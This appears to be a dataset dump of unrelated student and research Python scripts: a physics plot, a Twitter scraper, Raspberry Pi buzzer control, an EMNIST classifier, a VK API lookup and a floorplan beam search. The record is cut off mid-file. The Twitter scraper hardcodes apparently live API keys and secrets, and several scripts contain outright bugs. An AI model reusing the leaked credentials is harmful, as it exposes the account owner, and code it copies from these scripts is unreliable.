+{"seq_id":"428468929","text":"from scipy import *\nimport numpy as np\nfrom numpy import sin, cos, sqrt, arctan, pi, exp\nimport matplotlib.pyplot as plt\nfrom qutip import *\nfrom scipy import integrate\nfrom scipy.integrate import quad, dblquad, nquad\nimport math\nfrom sympy import *\n\n# refer:Physics Reports 718–719 (2017) 1–102\n# Microwave photonics with superconducting quantum circuits\n# Xiu Gu a,b,1, Anton Frisk Kockum b,1, Adam Miranowicz b,c, Yu-xi Liu a,b,d,*,\n# Franco Nori b,e,*\n\nng_list = np.arange(-2.2, 2.2, 0.1)\n\ndef Hami(ng,Ec = 1, Ej = 1):\n nq = 40\n Hm = 0\n for i in range(nq):\n Hm += 4 * Ec * ((i - nq / 2) - ng) ** 2 * basis(nq, i) * basis(nq, i).dag()\n if i >= 1:\n Hm += -0.5 * Ej * (basis(nq, i) * basis(nq, i - 1).dag())\n Hm += -0.5 * Ej * (basis(nq, i - 1) * basis(nq, i).dag())\n\n return Hm\n\n\ndef get_eigenenergy_list(Ec = 1, Ej = 1):\n E_list = []\n for ng in ng_list:\n H = Hami(ng,Ec = Ec, Ej = Ej)\n E_list.append(H.eigenenergies())\n return E_list\n\n\ndef draw(save=False, ymax=2.5):\n fig, axes = plt.subplots(1, 3, figsize=(15, 5))\n\n ec = 1\n ej = 1\n E01_ava = Hami(1 / 2, Ec=ec, Ej=ej).eigenenergies()\n E01 = E01_ava[1] - E01_ava[0]\n\n Ezero = Hami(-2, Ec=ec, Ej=ej).eigenenergies()\n E_zero = Ezero[0]\n\n E_list = get_eigenenergy_list(Ec=ec, Ej=ej)\n\n axes[0].plot(ng_list, [(E[0] - E_zero) / E01 for E in E_list], c='black')\n axes[0].plot(ng_list, [(E[1] - E_zero) / E01 for E in E_list], c='red')\n axes[0].plot(ng_list, [(E[2] - E_zero) / E01 for E in E_list], c='blue')\n axes[0].plot(ng_list, [(E[3] - E_zero) / E01 for E in E_list])\n axes[0].plot(ng_list, [(E[4] - E_zero) / E01 for E in E_list])\n axes[0].set_xlabel(r'$n_g$', fontsize=15)\n axes[0].set_ylabel(r'$E_m/E_{01}$', fontsize=15)\n axes[0].set_xlim(-2, 2)\n axes[0].set_title(r'$E_J/E_C = 1$', fontsize=15)\n\n ec = 1\n ej = 10\n E01_ava = Hami(1 / 2, Ec=ec, Ej=ej).eigenenergies()\n E01 = E01_ava[1] - E01_ava[0]\n\n Ezero = Hami(-2, Ec=ec, Ej=ej).eigenenergies()\n E_zero = Ezero[0]\n\n E_list = get_eigenenergy_list(Ec=ec, Ej=ej)\n\n\n axes[1].plot(ng_list, [(E[0] - E_zero) / E01 for E in E_list], c='black')\n axes[1].plot(ng_list, [(E[1] - E_zero) / E01 for E in E_list], c='red')\n axes[1].plot(ng_list, [(E[2] - E_zero) / E01 for E in E_list], c='blue')\n axes[1].plot(ng_list, [(E[3] - E_zero) / E01 for E in E_list])\n axes[1].plot(ng_list, [(E[4] - E_zero) / E01 for E in E_list])\n axes[1].set_xlim(-2, 2)\n axes[1].set_xlabel(r'$n_g$', fontsize=15)\n axes[1].set_title(r'$E_J/E_C = 10$', fontsize=15)\n\n ec = 1\n ej = 50\n E01_ava = Hami(1 / 2, Ec=ec, Ej=ej).eigenenergies()\n E01 = E01_ava[1] - E01_ava[0]\n\n Ezero = Hami(-2, Ec=ec, Ej=ej).eigenenergies()\n E_zero = Ezero[0]\n\n E_list = get_eigenenergy_list(Ec=ec, Ej=ej)\n\n\n axes[2].plot(ng_list, [(E[0] - E_zero) / E01 for E in E_list], c='black')\n axes[2].plot(ng_list, [(E[1] - E_zero) / E01 for E in E_list], c='red')\n axes[2].plot(ng_list, [(E[2] - E_zero) / E01 for E in E_list], c='blue')\n axes[2].plot(ng_list, [(E[3] - E_zero) / E01 for E in E_list])\n axes[2].plot(ng_list, [(E[4] - E_zero) / E01 for E in E_list])\n\n axes[2].set_xlim(-2, 2)\n axes[2].set_xlabel(r'$n_g$', fontsize=15)\n\n axes[2].set_title(r'$E_J/E_C = 50$', fontsize=15)\n\n\n if save == True:\n fig.savefig(fname='fig\\\\eigenenergies_EjtoEc=' + str(rate_EjEc) + '.png')\n return 'good'\n\n\ndraw(save=False, ymax=2.5)\nplt.show()\nhelp(set_title())","sub_path":"study_180718/code/reading_simu/review/transmon_eigen.py","file_name":"transmon_eigen.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"275072429","text":"import tweepy\nfrom tweepy import OAuthHandler\nimport os\nimport io\nimport wget\nimport urllib3.request\nfrom google.cloud import vision\nfrom google.cloud.vision import types\n\nconsumer_key = 'bvay7XKTdnuVg2TawE3OvY89D'\nconsumer_secret = '8tDJygIpj9nkmpBUENlFEG5Cxkgny9D2MOISVcdAYfOutNQ9JI'\naccess_token = '1040111094516404224-Wdo2WoRvvtvnEXVTD7GdqL8J8GJb6y'\naccess_secret = 'WV0VlSbnpIBNmGTR9nYVcsTAleB4mo48VfqplHayjcJPn'\n\ndef get_images(inputName):\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_secret)\n api = tweepy.API(auth)\n\n tweets = api.user_timeline(screen_name='inputName',count=30, include_rts=False,exclude_replies=True)\n images = []\n i = 0\n for status in tweets:\n image = status.entities.get('media', [])\n if(len(image) > 0):\n image_url = status.entities['media'][0]['media_url']\n file_name = \"%03d.jpg\"%i\n urllib3.request.urlretrieve(image_url, file_name)\n images.append(file_name)\n i = i+1\n\n return images\n\nget_images('kobebryant')\n\n'''def conver_mp4():\n command0 = 'ffmpeg -y -r 0.5 -i %03d.jpg -vf scale=-600:600 -y -r 30 -t 60 test.mp4'\n os.system(command0)\n\ndef descript():\n\n\n client = vision.ImageAnnotatorClient()\n\n\n file_name = os.path.join(\n os.path.dirname(__file__),\n 'resources/wakeupcat.jpg')\n\n for image in image_file\n with io.open(file_name, 'rb') as image_file:\n content = image_file.read()\n\n image = types.Image(content=content)\n\n # Performs label detection on the image file\n response = client.label_detection(image=image)\n labels = response.label_annotations\n\n print('Labels:')\n for label in labels:\n print(label.description)\n\n\n\n'''","sub_path":"miniproj1part1part2finish.py","file_name":"miniproj1part1part2finish.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"427282540","text":"import RPi.GPIO as GPIO\nimport time\nimport socketio\nfrom model.util.Config import Config\nfrom model.util.Socket import Socket\nfrom model.util.AQI import AQI\nimport random\n\ndef beep(seconds):\n GPIO.output(PIN_NUM, True)\n time.sleep(seconds)\n GPIO.output(PIN_NUM, False)\n\ndef beep_action(sec, sleep_sec):\n beep(sec)\n time.sleep(sleep_sec)\n\n# 取得設定檔案\nconfig = Config()\nPIN_NUM = int(config.getValue('buzzer', 'pin'))\nPIN_MODE = config.getValue('buzzer', 'mode')\n\n# 初始化蜂鳴器速度\naqi = AQI()\nMETRIX = ['CO', 'LPG', 'Smoke']\nscore, total = aqi.get_latest_value(METRIX)\nSLEEP = 1 * ((total-score)/total)\n\n# 初始化 socket\nsocket = Socket()\nconnection = socket.connect()\nsio = socket.get_socket()\n\n# 如果WebSocker建立連線成功\nif connection:\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(PIN_NUM, GPIO.OUT)\n\n @sio.on('buzzer_off_publish_server', namespace='/pi')\n @sio.on('server_clean_pub', namespace='/pi')\n def on_message(data):\n print(\"[@Buzzer]TEST\")\n global status\n status = False\n\n @sio.on('buzzer_status_check_pub_system', namespace='/pi')\n def check(data):\n print('[@Buzzer] Buzzer Check...')\n sio.emit('buzzer_status_pub_pi', {'status': True, 'method': '被動'}, namespace='/pi')\n\n # 取得最新感測資料\n @sio.on('sensor_data_pub_system', namespace='/system')\n def latest(payload):\n global aqi\n global METRIX\n global SLEEP\n score, total = aqi.calc(METRIX, payload['data'])\n SLEEP = 1 * ((total-score)/total)\n print(\"[@Buzzer] 目前分數(越低越佳)\", score, \"/\", total)\n\n status = True\n\n # Change duty cycle for varying the brightness of buzzer.\n while status:\n sio.emit('buzzer_status_pub_pi', {'status': True}, namespace='/pi')\n beep_action(0.01, SLEEP)\n\n try:\n sio.call(event='buzzer_status_pub_pi', data={'status': False}, namespace='/pi', timeout=30)\n print('wait')\n except socketio.exceptions.TimeoutError as err:\n print('timeout')\nelse:\n print(\"[@Buzzer] 無法建立WebSocket連線,資料無法發送\")\n\nsocket.close()\n","sub_path":"Buzzer.py","file_name":"Buzzer.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"258290571","text":"#1. accepts the gender in terms of male or female from user. (if client enters wrong input instead of putting error it will display an appropriate msg And exits. )\ngender = input(\"Enter gender\\t\")\nif gender == 'male' or gender == 'female'or gender == 'Male' or gender == 'Female' or gender == 'MALE' or gender == 'FEMALE':\n print(\"Correct\")\nelse:\n print(\"wrong input\")\n\n#2. Accept the name, and prints the name with salutation according to gender like sir ( \"Hello input-wala-name, sir\") for male and mam for female...\nname = input(\"Enter name \")\ngen = input(\"Enter sex, m for mae, f for female \")\nif name.isalpha():\n if gen == 'm':\n print(\"Hello {} sir\".format(name))\n elif gen == 'f':\n print(\"Hello {} ma'am\".format(name))\n else:\n print(\"Wrong gender entered, enter only m or f\")\nelse:\n print(\"Wrong name entered\")\n\n\n'''3. Ask their age and check the age criteria, if the age of man is greater than 20, it will print.. you are able to enroll\n for python fundamental course otherwise it will display an msg that you are below age criteria\n you can't enroll the course..and exits. (program does not throw any kind of error here.) '''\nage = int(input(\"Enter age \"))\nif age>20:\n print(\"You are able to enroll for python fundamental course\")\nelse:\n print(\"you are below age criteria and you can't enroll the course..\")\n\n\n#4.if Age of women is greater than 19 she is available to enroll for core Java course.(same criteria error will not displayed)\nage = int(input(\"Enter age \"))\nif age>19:\n print(\"You are able to enroll for java course\")\nelse:\n print(\"you are below age criteria and you can't enroll the course..\")\n\n\n'''5. If user enters wrong value like in case of input of name of he enters numeric value, does not enter name by passing simply enter,\n it will guide the user to enter alphabetic value and some text incase of blank input. '''\n\nname = input(\"Enter name \")\nage = input(\"Enter age \")\nif name.isalpha():\n print(\"Name is \",name)\nelse:\n print(\"Wrong input, enter alphabetical name\")\nif age.isnumeric():\n print(\"Age is \",age)\nelse:\n print(\"Enter ony numeral age\")\n\n\n\n","sub_path":"Extra1.py","file_name":"Extra1.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"167320107","text":"from openpyxl import Workbook\nfrom openpyxl import load_workbook\n\ndef get_data(ro,col,sheet):\n return sheet.cell(row = ro, column = col).value\n\n#main\n\n#load the excel\nwork_b = load_workbook(filename='_ori.xlsx') #here is the name of your xlsx file\nsheetnames = work_b.get_sheet_names()\nsheet = work_b.get_sheet_by_name(sheetnames[0])\n\nwb = Workbook() # Creat sheet\nws = wb.active\n\n#\npre = 0\nr_row =1\nseq = 1\nfor row in range(1,500000):\n if get_data(row,1,sheet) == \"stop_here\":\n ws['A' + str(r_row)] = \"stop_here\"\n break\n if get_data(row,1,sheet) == \"another_day\":\n ws['A' + str(r_row)] = \"another_day\"\n print(r_row)\n r_row += 1\n continue\n section = int(get_data(row, 6, sheet))\n\n if (get_data(row, 1, sheet) == \"section\") :\n pre = int(get_data(row, 5, sheet))\n first = row\n if section>1:\n ws['A' + str(r_row)] = get_data(row, 1, sheet)\n ws['E' + str(r_row)] = seq - 1\n ws['F' + str(r_row)] = get_data(row, 6, sheet)-1\n r_row += 1\n seq = 1\n continue\n if(section>1):\n repeat = True\n for i in range(1,pre+1):\n if (get_data(row, 4, sheet) == get_data(first - i, 4, sheet)) & (get_data(row, 2, sheet) == get_data(first - i, 2, sheet)) & (\n get_data(row, 3, sheet) == get_data(first - i, 3, sheet) ):\n repeat = False\n break\n if repeat == True:\n ws['A' + str(r_row)] = get_data(row, 1, sheet)\n ws['B' + str(r_row)] = get_data(row, 2, sheet)\n ws['C' + str(r_row)] = get_data(row, 3, sheet)\n ws['D' + str(r_row)] = get_data(row, 4, sheet)\n ws['E' + str(r_row)] = seq\n ws['F' + str(r_row)] = get_data(row, 6, sheet)-1\n r_row += 1\n seq+=1\n\nwb.save(\"_fix_rp.xlsx\")\n","sub_path":"Assignment02/Gaussian_extraction/step2_repeatscan.py","file_name":"step2_repeatscan.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"160091052","text":"import requests\n\nuser_id = 'id385236652'\napi_url = 'https://api.vk.com/method/'\n\ndef get_user(name):\n data = requests.get(api_url+'users.get',{'fields': 'photo_max',\n 'user_ids':name,\n 'v':'5.74'})\n return data.json()\nprint(get_user(user_id))\n\ndef get_friends(name):\n data = requests.get(api_url+'friends.get',{'user_id':name,\n 'v':'5.74'})\n return data.json()\n\nfriends1 = set(get_friends('311867269')['response']['items'])\nfriends2 = set(get_friends('385236652')['response']['items'])\nprint(friends1&friends2)\n\n\n\nfriends = friends1 & friends2\n\n\n\n\nfor i in friends:\n print(get_user(i))\n\n\n#user = get_user(user_id)\n#url_image = user['response'][0]['photo_max']\n#image = requests.get(url_image)\n#image_file=open('image.jpg','wb')\n#image_file.write(image.content)\n#image_file.close()\n#print(user)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"47531656","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import svm, metrics\nfrom sklearn.model_selection import train_test_split\n\n\nclass_mapping = '_ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nlabels=['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n#labels=['0','1','2','3','4','5','6','7','8','9']\ndef load_data():\n \"\"\" Loads data from the data set, returns x and y for both test and train \"\"\"\n # Letters\n train_data_path = 'emnist/emnist-letters-train.csv'\n test_data_path = 'emnist/emnist-letters-test.csv'\n\n #Digits\n #train_data_path = 'emnist/emnist-digits-train.csv'\n #test_data_path = 'emnist/emnist-digits-test.csv'\n\n train_data = pd.read_csv(train_data_path, header=None)\n test_data = pd.read_csv(test_data_path, header=None)\n\n # Separate labels from data and convert to numpy arrays\n X_train = (train_data.iloc[:, 1:].values)\n y_train = train_data.iloc[:, 0].values\n X_test = (test_data.iloc[:, 1:].values)\n y_test = test_data.iloc[:, 0].values\n\n return X_train, y_train, X_test, y_test\n\ndef plot_heatmap(expected,predicted,labels):\n\n \"\"\"Plots a confusion matrix for expected and predicted values. \"\"\"\n fig, ax = plt.subplots()\n cm=metrics.confusion_matrix(expected, predicted)\n plt.imshow(cm,aspect='auto')\n print(cm.shape, len(labels))\n cbar=plt.colorbar()\n cbar.ax.tick_params(labelsize=14)\n plt.xticks(np.arange(len(labels)),labels,fontsize=14)\n plt.yticks(np.arange(len(labels)),labels,fontsize=14)\n #Add text\n for i in range(len(cm)):\n for j in range(len(cm)):\n if cm[i][j]<10:\n text_s='%01.0f' % (cm[i][j])\n else:\n text_s='%02.0f' % (cm[i][j])\n\n if cm[i][j]>500: #black is most sutable on yellow background\n text = ax.text(j, i, text_s, ha=\"center\", va=\"center\", color=\"k\",fontsize=14)\n\n else:#white is most sutable on purple background\n text = ax.text(j, i, text_s, ha=\"center\", va=\"center\", color=\"w\",fontsize=14)\n plt.ylabel('Expected',fontsize=14)\n plt.xlabel('Predicted',fontsize=14)\n plt.savefig(\"cm_digits_test_.pdf\")\n plt.show()\n\ndef find_images(test_samples, expected,predicted,labels):\n \"\"\"Creats images of misclassified letters. Saves the images. It is costumized to find L,I,Q and G,\n future work will be to make it more general \"\"\"\n L=True; I=True; Q=True; G=True # It stops after finding one image of each class\n for i in range(test_samples):\n if expected[i]!=predicted[i] and expected[i]==12 and predicted[i]==9 and L==True:\n plt.figure()\n plt.title('Expected: ' + labels[11] + ', Predicted: ' + labels[8], fontsize=14)\n print(i,data_test[i, 1:].shape)\n img_flip = np.transpose(data_test[i, 0:].reshape(28, 28), axes=[1,0])\n plt.imshow(img_flip, cmap='Greys_r')\n plt.savefig('L_I.pdf')\n L=False\n if expected[i]!=predicted[i] and expected[i]==9 and predicted[i]==12 and I==True:\n print('her')\n plt.figure()\n plt.title('Expected: ' + labels[8] + ', Predicted: ' + labels[11], fontsize=14)\n print(i,data_test[i, 1:].shape)\n img_flip = np.transpose(data_test[i, 0:].reshape(28, 28), axes=[1,0])\n plt.imshow(img_flip, cmap='Greys_r')\n plt.savefig('I_L.pdf')\n I=False\n if expected[i]!=predicted[i] and expected[i]==7 and predicted[i]==17 and G==True:\n plt.figure()\n plt.title('Expected: ' + labels[6] + ', Predicted: ' + labels[16], fontsize=14)\n print(i,data_test[i, 1:].shape)\n img_flip = np.transpose(data_test[i, 0:].reshape(28, 28), axes=[1,0])\n plt.imshow(img_flip, cmap='Greys_r')\n plt.savefig('G_Q.pdf')\n G=False\n if expected[i]!=predicted[i] and expected[i]==17 and predicted[i]==7 and Q==True:\n plt.figure()\n plt.title('Expected: ' + labels[16] + ', Predicted: ' + labels[6], fontsize=14)\n print(i,data_test[i, 1:].shape)\n img_flip = np.transpose(data_test[i, 0:].reshape(28, 28), axes=[1,0])\n plt.imshow(img_flip, cmap='Greys_r')\n plt.savefig('Q_G.pdf')\n Q=False\n\n\n\nX_train, y_train, X_test, y_test = load_data()\n\ntrain_samples=len(X_train)\ntest_samples=len(X_test)\n\ndata=X_train\ndata_test=X_test\n\n#Use suport vector machine to predict.\nclassifier = svm.SVC(degree=2,kernel='poly')\nclassifier.fit(data,y_train)\n\nexpected = y_test\npredicted = classifier.predict(data_test)\nexpected_train=y_train\npredicted_train=classifier.predict(data)\n\nfind_images(test_samples, expected,predicted,labels)\nprint(\"accuracy test= \",metrics.accuracy_score(expected, predicted))\nprint(\"accuracy train= \",metrics.accuracy_score(expected_train, predicted_train))\nplot_heatmap(expected,predicted,labels)\n","sub_path":"SMV_emnist.py","file_name":"SMV_emnist.py","file_ext":"py","file_size_in_byte":4950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"648185661","text":"#Data Types, Operators and Expressions\n# -*- coding: UTF-8 -*-\n\na = 11\nb = 22\n\n#优:速度快 缺:多分配了内存\ns = \"{} {}\".format(a, b)\nt = a\na = b\nb = t\nprint(s + \" => {} {}\".format(a, b))\n\n#优:节约内存分配 缺:速度慢,不支持浮点数对换\ns = \"{} {}\".format(a, b)\na = a ^ b\nb = a ^ b\na = a ^ b\nprint(s + \" => {} {}\".format(a, b))\n\n#优:内存分配少 缺:速度慢,运算过程中可能发生数据溢出(但不影响计算结果)\ns = \"{} {}\".format(a, b)\na = a + b\nb = a - b\na = a - b\nprint(s + \" => {} {}\".format(a, b))\n\n#优:代码简洁,可读性高 缺:效率有可能偏慢(由解释器决定)\ns = \"{} {}\".format(a, b)\na, b = b, a\nprint(s + \" => {} {}\".format(a, b))\n\nf1 = 1.6667\nf2 = 1.6668\ndt = 1e-3\nisEq = f1 > f2 - dt and f1 < f2 + dt\nfmsg = 'eq' if (isEq) else 'ne'\nprint(\"{} {} {} {}\".format(f1, f2, dt, fmsg))\n\nyear = 2016\nisLeap = year & 3 == 0 and year % 100 != 0 or year % 400 == 0\nymsg = 'yes' if (isLeap) else 'no'\nprint(\"{} {}\".format(year, ymsg))\n\nc = 5\nisEven = c % 2 == 0\nemsg = 'even' if (isEven) else 'odd'\nprint(\"{} {}\".format(c, emsg))\n\nisEven = c & 1 == 0\nemsg = 'even' if (isEven) else 'odd'\nprint(\"{} {}\".format(c, emsg))\n\nn = 8\nis2k = n > 0 and n & (n - 1) == 0\nkmsg = 'yes' if (is2k) else 'no'\nprint(\"{} {}\".format(n, kmsg))\n\nn1 = 3\nans = (n1 << 4) + n1\nprint(\"{} x 17 = {}\".format(n1, ans))\n\nn2 = 10\nans1 = n2 & 7\nprint(\"{} % 8 = {}\".format(n2, ans1))\n\nn3 = 0b11100000\nans2 = n3 >> 4\nprint(\"{} / 16 = {}\".format(n3, ans2))\n\nm = 0o644\nm1 = 0o600\nm2 = m | 0o111\nm3 = m | 0o200\nm4 = m & 0o755\nprint('{:o}: {:o} {:o} {:o} {:o}'.format(m, m1, m2, m3, m4))\n","sub_path":"operators/dark-w.py","file_name":"dark-w.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"254363018","text":"#\n\narray = [i for i in range(2, 100)]\narray1 = [i for i in range(2, 10)]\n\nprint(array)\nprint(array1)\namount = 0\nfor i in array1:\n for j in array:\n if j % i == 0:\n amount += 1\n print(f'{i} => {amount} раз')\n amount = 0\n","sub_path":"lesson3/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"149289689","text":"def requirements():\n print('''1. Program converts user-entered temperature into Fahrenheit or Celsius scales\n2. Program comntinues to prompt user until specified not to\n3. Note: upper and lowercase letters permited, though incorrect entries are not permited\n4. Note: Program does not validate numeric data''' )\n\ndef convertion():\n scale = input('Fahrenheit to Celsius? Type \"f\", or Celsius to Fahrenheit? Type \"c\": ')\n scale = scale.lower()\n if scale == 'f':\n temp = float(input('Enter temperature in Fehrenheit: '))\n temp = float(((temp - 32) * 5)/9)\n print('Temperature in Celsius is:', round(temp,1))\n elif scale == 'c':\n temp = float(input('Enter temperature in Celsius: '))\n temp = float(((temp * 9)/5)+32)\n print('Temperature in Fehrenheit is:', round(temp,1))\n else: \n print('Not a valid option')\n\n\n\ndef main():\n requirements()\n print()\n init = input('Do you want to convert a temperature (y or n)? ')\n print()\n while True:\n init = init.lower()\n if init == 'y':\n convertion()\n print()\n init = input('Do you want to convert another temperature (y or n)? ')\n print()\n elif init == 'n':\n print('Thank you for using my temperature convertion program')\n break\n else: \n print('Incorrect entry. Please try again')\n init = input('Do you want to convert a temperature (y or n)? ')\n print()\n\n\nmain()","sub_path":"skillSet/skillSet12.py","file_name":"skillSet12.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"300980688","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport time\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\nimport random\nimport torch\nfrom new_dataset import myDataset\nfrom new_scoreAgent import scoreEvaluator\nfrom tqdm import tqdm\nimport threading\nfrom new_utils import visualization, candidate_enumerate, reduce_duplicate_candidate, Graph, Candidate\nfrom SVG_utils import svg_generate\n\ndata_folder = '/local-scratch/fuyang/cities_dataset'\nbeam_width = 6\nbeam_depth = 10\nis_visualize = False\nis_save = True\nsave_path = '/local-scratch/fuyang/result/beam_search_v2/without_search_constraint/old/'\n\n\ntest_dataset = myDataset(data_folder, phase='valid', edge_linewidth=2, render_pad=-1)\n\ntest_loader = torch.utils.data.DataLoader(test_dataset,\n batch_size=1,\n shuffle=True,\n num_workers=1,\n drop_last=True)\n\nevaluator = scoreEvaluator({'cornerModelPath':'/local-scratch/fuyang/result/corner_v2/gt_mask_with_gt/models/440.pt',\n 'edgeModelPath':'/local-scratch/fuyang/result/corner_edge_region/edge_graph_drn26_with_search_v2/models/best.pt',\n 'regionModelPath': '/local-scratch/fuyang/result/corner_edge_region/region_graph_iter_0/models/70.pt',\n 'region_iter': 0,\n 'edgeHeatmapPath': '/local-scratch/fuyang/result/corner_edge_region/edge_heatmap_unet/all_edge_masks',\n 'regionHeatmapPath': '/local-scratch/fuyang/result/corner_edge_region/all_region_masks',\n 'regionEntireMaskPath': '/local-scratch/fuyang/result/corner_edge_region/entire_region_mask'\n }, useHeatmap=('region'), useGT=(), dataset=test_dataset)\n\n\nclass _thread(threading.Thread):\n def __init__(self, threadID, name, candidate, lock, result_list, func):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.candidate = candidate\n self.lock = lock\n self.result_list = result_list\n self.func = func\n def run(self):\n print('running id: ', self.name)\n start_time = time.time()\n candidates = self.func(self.candidate)\n print('test: =================================', self.name, len(candidates))\n self.lock.acquire()\n self.result_list.extend(candidates)\n self.lock.release()\n print(self.name, \"spend time: {}s\".format(time.time()-start_time))\n\n\n\ndef save_candidate_image(candidate, base_path, base_name):\n corners = candidate.graph.getCornersArray()\n edges = candidate.graph.getEdgesArray()\n # graph svg\n svg = svg_generate(corners, edges, base_name, samecolor=True)\n svg.saveas(os.path.join(base_path, base_name+'.svg'))\n # corner image\n temp_mask = np.zeros((256,256))\n for ele in candidate.graph.getCorners():\n if ele.get_score() < 0:\n temp_mask = cv2.circle(temp_mask, ele.x[::-1], 3, 1, -1)\n fig = plt.figure(frameon=False)\n fig.set_size_inches(1,1)\n ax = plt.Axes(fig, [0.,0.,1.,1.])\n ax.set_axis_off()\n fig.add_axes(ax)\n ax.imshow(temp_mask, aspect='auto')\n fig.savefig(os.path.join(base_path, base_name+'_corner.png'), dpi=256)\n # edges image\n temp_mask = np.zeros((256,256))\n for ele in candidate.graph.getEdges():\n if ele.get_score() < 0:\n A = ele.x[0]\n B = ele.x[1]\n temp_mask = cv2.line(temp_mask, A.x[::-1], B.x[::-1], 1, thickness=1)\n ax.imshow(temp_mask, aspect='auto')\n fig.savefig(os.path.join(base_path, base_name+'_edge.png'), dpi=256)\n # region no need fig\n plt.close()\n\n\nfor idx, data in enumerate(test_loader):\n name = data['name'][0]\n #if name != '1553901866.54':\n # continue\n img = data['img'][0]\n graph_data = test_dataset.getDataByName(name)\n conv_data = graph_data['conv_data']\n corners = conv_data['corners']\n corners = np.round(corners).astype(np.int)\n edges = conv_data['edges']\n\n gt_data = graph_data['gt_data']\n gt_corners = gt_data['corners']\n gt_corners = np.round(gt_corners).astype(np.int)\n gt_edges = gt_data['edges']\n\n # gt score\n gt_candidate = Candidate.initial(Graph(gt_corners, gt_edges), name)\n evaluator.get_score(gt_candidate)\n\n # initial score\n initial_candidate = Candidate.initial(Graph(corners, edges), name)\n\n print(\"####################################################################\")\n print(\"####################################################################\")\n print(name)\n print(\"####################################################################\")\n print(\"####################################################################\")\n evaluator.get_score(initial_candidate)\n\n # candidate gallery\n candidate_gallery = []\n candidate_gallery.append([initial_candidate])\n\n epoch = min(beam_depth, corners.shape[0]*2)\n prev_candidates = [initial_candidate]\n best_candidates = [initial_candidate]\n _best_count = 0\n for epoch_i in range(epoch):\n print(\"======================== epoch \", epoch_i, \" =======================\")\n start_time = time.time()\n current_candidates = []\n for prev_i in range(len(prev_candidates)):\n prev_ = prev_candidates[prev_i]\n current_candidates.extend(candidate_enumerate(prev_))\n\n print(\"all prev candidate enumerate done.\", \"overall\", len(current_candidates), \"candidates\")\n\n current_candidates = reduce_duplicate_candidate(current_candidates)\n\n print(\"reduce duplicate candidates done.\", \"overall\", len(current_candidates), \"candidates\")\n\n # uncomment to get robust fast score but slower\n #for candidate_i in tqdm(range(len(current_candidates))):\n # evaluator.get_fast_score(current_candidates[candidate_i])\n\n eval_time = time.time()\n evaluator.get_fast_score_list(current_candidates)\n print('average time: {}s/sample'.format((time.time()-eval_time) / len(current_candidates)))\n\n for candidate_i in range(len(current_candidates)):\n if best_candidates[0].graph.graph_score() < current_candidates[candidate_i].graph.graph_score():\n best_candidates = [current_candidates[candidate_i]]\n _best_count = -1\n elif best_candidates[0].graph.graph_score() == current_candidates[candidate_i].graph.graph_score():\n best_candidates.append(current_candidates[candidate_i])\n _best_count = -1\n _best_count += 1\n\n\n print(\"finish evaluating all candidates\")\n\n current_candidates = sorted(current_candidates, key=lambda x:x.graph.graph_score(), reverse=True)\n if len(current_candidates) < beam_width:\n pick = np.arange(len(current_candidates))\n else:\n pick = np.arange(beam_width)\n\n prev_candidates = [current_candidates[_] for _ in pick]\n\n # update safe_count\n for candidate_ in prev_candidates:\n candidate_.update()\n candidate_gallery.append(prev_candidates)\n print(\"========================finish epoch: \", epoch_i, \"=====================================\")\n print(\"spend time: {}s\".format(time.time()-start_time))\n if _best_count == 3:\n break\n\n\n if is_save:\n os.makedirs(save_path, exist_ok=True)\n base_path = os.path.join(save_path, name)\n os.makedirs(base_path, exist_ok=True)\n\n ##################################### GT ############################################\n base_name = 'gt_pred'\n save_candidate_image(gt_candidate, base_path, base_name)\n\n ################################### search ##########################################\n for k in range(len(candidate_gallery)):\n current_candidates = candidate_gallery[k]\n for idx, candidate_ in enumerate(current_candidates):\n base_name = 'iter_'+str(k)+'_num_'+str(idx)\n save_candidate_image(candidate_, base_path, base_name)\n\n #################################### best ###########################################\n for k in range(len(best_candidates)):\n candidate_ = best_candidates[k]\n base_name = 'best_'+str(k)\n save_candidate_image(candidate_, base_path, base_name)\n\n ################################ save config ########################################\n data = {}\n # gt\n corner_count = 0\n edge_count = 0\n for ele in gt_candidate.graph.getCorners():\n if ele.get_score() < 0:\n corner_count +=1\n for ele in gt_candidate.graph.getEdges():\n if ele.get_score() < 0:\n edge_count += 1\n data['gt'] = {'score': round(gt_candidate.graph.graph_score(), 2),\n 'corner_score': round(gt_candidate.graph.corner_score(), 2),\n 'edge_score': round(gt_candidate.graph.edge_score(), 2),\n 'region_score': round(gt_candidate.graph.region_score(), 2),\n 'false_corner': corner_count,\n 'false_edge': edge_count}\n\n # pred\n for k in range(len(candidate_gallery)):\n current_candidates = candidate_gallery[k]\n for idx, candidate_ in enumerate(current_candidates):\n corner_count = 0\n edge_count = 